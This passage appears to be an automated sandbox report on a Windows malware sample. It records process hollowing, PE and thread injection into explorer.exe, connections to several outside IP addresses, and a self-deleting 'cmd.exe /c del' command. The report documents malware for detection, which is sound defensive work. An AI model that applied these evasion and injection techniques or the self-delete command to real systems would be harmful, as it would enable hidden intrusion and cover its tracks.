          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05048794 mov eax, dword ptr fs:[00000030h]11_2_05048794
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05062397 mov eax, dword ptr fs:[00000030h]11_2_05062397
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506B390 mov eax, dword ptr fs:[00000030h]11_2_0506B390
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B7794 mov eax, dword ptr fs:[00000030h]11_2_050B7794
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B7794 mov eax, dword ptr fs:[00000030h]11_2_050B7794
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B7794 mov eax, dword ptr fs:[00000030h]11_2_050B7794
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05064BAD mov eax, dword ptr fs:[00000030h]11_2_05064BAD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05064BAD mov eax, dword ptr fs:[00000030h]11_2_05064BAD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05064BAD mov eax, dword ptr fs:[00000030h]11_2_05064BAD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05105BA5 mov eax, dword ptr fs:[00000030h]11_2_05105BA5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B53CA mov eax, dword ptr fs:[00000030h]11_2_050B53CA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050B53CA mov eax, dword ptr fs:[00000030h]11_2_050B53CA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050603E2 mov eax, dword ptr fs:[00000030h]11_2_050603E2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050603E2 mov eax, dword ptr fs:[00000030h]11_2_050603E2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050603E2 mov eax, dword ptr fs:[00000030h]11_2_050603E2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050603E2 mov eax, dword ptr fs:[00000030h]11_2_050603E2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050603E2 mov eax, dword ptr fs:[00000030h]11_2_050603E2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050603E2 mov eax, dword ptr fs:[00000030h]11_2_050603E2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0505DBE9 mov eax, dword ptr fs:[00000030h]11_2_0505DBE9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050737F5 mov eax, dword ptr fs:[00000030h]11_2_050737F5
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503C600 mov eax, dword ptr fs:[00000030h]11_2_0503C600
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503C600 mov eax, dword ptr fs:[00000030h]11_2_0503C600
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503C600 mov eax, dword ptr fs:[00000030h]11_2_0503C600
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05068E00 mov eax, dword ptr fs:[00000030h]11_2_05068E00
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1608 mov eax, dword ptr fs:[00000030h]11_2_050F1608
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05048A0A mov eax, dword ptr fs:[00000030h]11_2_05048A0A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05035210 mov eax, dword ptr fs:[00000030h]11_2_05035210
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05035210 mov ecx, dword ptr fs:[00000030h]11_2_05035210
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05035210 mov eax, dword ptr fs:[00000030h]11_2_05035210
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05035210 mov eax, dword ptr fs:[00000030h]11_2_05035210
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503AA16 mov eax, dword ptr fs:[00000030h]11_2_0503AA16
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503AA16 mov eax, dword ptr fs:[00000030h]11_2_0503AA16
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05053A1C mov eax, dword ptr fs:[00000030h]11_2_05053A1C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506A61C mov eax, dword ptr fs:[00000030h]11_2_0506A61C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506A61C mov eax, dword ptr fs:[00000030h]11_2_0506A61C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503E620 mov eax, dword ptr fs:[00000030h]11_2_0503E620
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05074A2C mov eax, dword ptr fs:[00000030h]11_2_05074A2C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05074A2C mov eax, dword ptr fs:[00000030h]11_2_05074A2C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050EFE3F mov eax, dword ptr fs:[00000030h]11_2_050EFE3F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05039240 mov eax, dword ptr fs:[00000030h]11_2_05039240
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05039240 mov eax, dword ptr fs:[00000030h]11_2_05039240
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05039240 mov eax, dword ptr fs:[00000030h]11_2_05039240
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05039240 mov eax, dword ptr fs:[00000030h]11_2_05039240
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05047E41 mov eax, dword ptr fs:[00000030h]11_2_05047E41
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05047E41 mov eax, dword ptr fs:[00000030h]11_2_05047E41
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05047E41 mov eax, dword ptr fs:[00000030h]11_2_05047E41
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05047E41 mov eax, dword ptr fs:[00000030h]11_2_05047E41
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05047E41 mov eax, dword ptr fs:[00000030h]11_2_05047E41
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05047E41 mov eax, dword ptr fs:[00000030h]11_2_05047E41
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050FAE44 mov eax, dword ptr fs:[00000030h]11_2_050FAE44
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050FAE44 mov eax, dword ptr fs:[00000030h]11_2_050FAE44
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050FEA55 mov eax, dword ptr fs:[00000030h]11_2_050FEA55
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050C4257 mov eax, dword ptr fs:[00000030h]11_2_050C4257
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504766D mov eax, dword ptr fs:[00000030h]11_2_0504766D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050EB260 mov eax, dword ptr fs:[00000030h]11_2_050EB260
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050EB260 mov eax, dword ptr fs:[00000030h]11_2_050EB260
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 202.66.173.116 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 94.23.162.163 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 118.27.99.84 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 35.246.6.109 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 142.91.239.112 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 184.106.16.223 80Jump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeMemory written: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeThread register set: target process: 3424Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeSection unmapped: C:\Windows\SysWOW64\explorer.exe base address: 13E0000Jump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess created: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe {path}Jump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess created: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe'Jump to behavior
          Source: explorer.exe, 00000007.00000002.911089779.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000007.00000000.690773067.0000000001080000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000002.912803078.0000000003750000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.733414389.00000000032E0000.00000040.00000001.sdmp, explorer.exe, 00000007.00000000.690773067.0000000001080000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000002.912803078.0000000003750000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.690773067.0000000001080000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000002.912803078.0000000003750000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.733414389.00000000032E0000.00000040.00000001.sdmpBinary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
          Source: explorer.exe, 00000007.00000000.690773067.0000000001080000.00000002.00000001.sdmp, explorer.exe, 0000000B.00000002.912803078.0000000003750000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000007.00000000.711037304.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
